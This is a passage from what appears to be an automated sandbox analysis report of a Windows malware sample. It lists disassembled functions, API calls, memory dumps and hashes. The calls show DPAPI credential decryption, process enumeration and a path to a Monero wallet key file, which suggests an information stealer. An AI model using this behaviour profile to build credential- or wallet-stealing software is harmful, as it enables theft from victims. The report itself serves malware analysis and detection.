                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CBC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CBC87C
                          • lstrcat.KERNEL32(?,00CD0B46), ref: 00CBC943
                          • lstrcat.KERNEL32(?,00CD0B47), ref: 00CBC957
                          • lstrcat.KERNEL32(?,00CD0B4E), ref: 00CBC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: f3c201fbaeffce78ba1b08aac37c6c5ed064e965b2f6bd50879349686eda100d
                          • Instruction ID: 4ebd81cc1585916d1bdb48c1e7be763477e4959fc7e426b8d4ccedec6eaf699b
                          • Opcode Fuzzy Hash: f3c201fbaeffce78ba1b08aac37c6c5ed064e965b2f6bd50879349686eda100d
                          • Instruction Fuzzy Hash: C1416EB4D0421ADFDB10DF94DC89BFEB7B8AB88304F1441B9E509A6280D7745B84CF92
                          Function 00CB7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00CB724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00CB7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00CB72A4
                          • LocalFree.KERNEL32(?), ref: 00CB72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: ffa812b27a2809c91ae4579033b509ac87451fde874f35e062e934f30d832b40
                          • Instruction ID: 4f12fb486a61f2518cf415d36daf7f6a23bae60ea429c1c0375cf854396fdad6
                          • Opcode Fuzzy Hash: ffa812b27a2809c91ae4579033b509ac87451fde874f35e062e934f30d832b40
                          • Instruction Fuzzy Hash: 440100B5A40208BFDB14DBE5DD49FAD7778AB84704F144155FB09BB2C0D6B0AA04CB65
                          Function 00CC9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CC961E
                          • Process32First.KERNEL32(00CD0ACA,00000128), ref: 00CC9632
                          • Process32Next.KERNEL32(00CD0ACA,00000128), ref: 00CC9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00CC965C
                          • CloseHandle.KERNEL32(00CD0ACA), ref: 00CC967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 89c4c23f3480a9f09d1d2d5ebaf461fcd0abf4c8e9d095730353f88ebd8c2f2b
                          • Instruction ID: ae28ba94f439bdfa340a7f8d48ab27630ed448d29d4e4ae80167b6b4fe43076b
                          • Opcode Fuzzy Hash: 89c4c23f3480a9f09d1d2d5ebaf461fcd0abf4c8e9d095730353f88ebd8c2f2b
                          • Instruction Fuzzy Hash: 4301E9B5A00208AFCB54DFA6CD48FEDB7F8EB48740F144199E909A6280D774AB44CF51
                          Function 010713F8 Relevance: 6.6, Strings: 4, Instructions: 1631COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Jrw$Z^?$|*<[$ys
                          • API String ID: 0-3302216416
                          • Opcode ID: 03503f5002b7c4186a75be51cea9943beecd2f9eb3475217747815de32aa7c47
                          • Instruction ID: 81176390d8573783bbfb7af0cc501c053163bf6ddad388b86b5f352b9db24a3d
                          • Opcode Fuzzy Hash: 03503f5002b7c4186a75be51cea9943beecd2f9eb3475217747815de32aa7c47
                          • Instruction Fuzzy Hash: 42B2F7F3A082049FE304AE29DC8567AF7E9EFD4720F1A893DE6C4C7744E63598058697
                          Function 00CC8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CD05B7), ref: 00CC86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00CC86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00CC86F3
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • CloseHandle.KERNEL32(?), ref: 00CC8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 86b3bc82e06a022a0b339055741e45e15875576438d56bf93795921b81516456
                          • Instruction ID: 170e370cacdf3fb776fbb7f218ccc1edab6a20ef30ef048c615064a3902515bd
                          • Opcode Fuzzy Hash: 86b3bc82e06a022a0b339055741e45e15875576438d56bf93795921b81516456
                          • Instruction Fuzzy Hash: 06314BB1901218ABCB24EF55DC49FEEB778EF45704F1041ADF50AA61A0EB706E49CFA1
                          Function 00CC8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00CB5184,40000001,00000000,00000000,?,00CB5184), ref: 00CC8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 65664dccc1cfbafe2c16773d3375218385f7f1d634cb5095c9ece12e6475835b
                          • Instruction ID: 6d6de2487f77c0e90b1772e9690e02f7f45e4d8a48ddbc4ed84aade8b3582bf9
                          • Opcode Fuzzy Hash: 65664dccc1cfbafe2c16773d3375218385f7f1d634cb5095c9ece12e6475835b
                          • Instruction Fuzzy Hash: CA1106B4200208AFDB04CFA5D888FBB37A9AF89314F14945CF919CB250DB75E94ADB60
                          Function 00CB9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 0c20082c574f794af0303f7bac0652bbabc1a856191af5b8685a787c448744fe
                          • Instruction ID: b47a390b5912e639b59db14513c6c04757b17f5ba8504bcaa00a247560fcdf47
                          • Opcode Fuzzy Hash: 0c20082c574f794af0303f7bac0652bbabc1a856191af5b8685a787c448744fe
                          • Instruction Fuzzy Hash: C911A4B4240308AFEB14CF65DC95FAA77B5FB89700F208058FA199F390C7B5AA01CB50
                          Function 00CC7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CD0E00,00000000,?), ref: 00CC79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00CD0E00,00000000,?), ref: 00CC79C4
                          • wsprintfA.USER32 ref: 00CC79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 84a7d89d46b17b2ec01a0145cf56650101f460b02c06645005fb92a9edf8f3e3
                          • Instruction ID: a0b37e759497c1e849de57ed97ad077c4e5588abfc6e2c80321fb1e21b877fce
                          • Opcode Fuzzy Hash: 84a7d89d46b17b2ec01a0145cf56650101f460b02c06645005fb92a9edf8f3e3
                          • Instruction Fuzzy Hash: E6112EB2904118ABCB14DFCADD45FBEB7F8FB4CB11F14411AF505A2280D2795944C7B1
                          Function 00CC7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0189E258,00000000,?,00CD0E10,00000000,?,00000000,00000000), ref: 00CC7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0189E258,00000000,?,00CD0E10,00000000,?,00000000,00000000,?), ref: 00CC7A7D
                          • wsprintfA.USER32 ref: 00CC7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: d16c573e434301ba15fb576466d121810b35a3797727cb520de27fb286d8c8f6
                          • Instruction ID: 24241c317fa3573604535031340c95fae54ce1a137bc8800ff3816b13eb930ba
                          • Opcode Fuzzy Hash: d16c573e434301ba15fb576466d121810b35a3797727cb520de27fb286d8c8f6
                          • Instruction Fuzzy Hash: 8211CEB1905218EFEB208B55CC49FA9B778FB40721F1003AAE90AA32C0D7741E44CF51
                          Function 00CC3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(00CCE118,00000000,00000001,00CCE108,00000000), ref: 00CC3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00CC37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 1c505840d1c63b28286c32e225b0348a17901530e27cb14b457f9fa3759a1dd1
                          • Instruction ID: 5c71347c94631384203dd877a3bc009f6a2458b148d74c77f5563eee97e754e9
                          • Opcode Fuzzy Hash: 1c505840d1c63b28286c32e225b0348a17901530e27cb14b457f9fa3759a1dd1
                          • Instruction Fuzzy Hash: DB41E770A40A289FDB24DB58DC95F9BB7B5BB48702F4081D9E608EB2D0D7716E85CF50
                          Function 00CB9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00CB9BA3
                          • LocalFree.KERNEL32(?), ref: 00CB9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
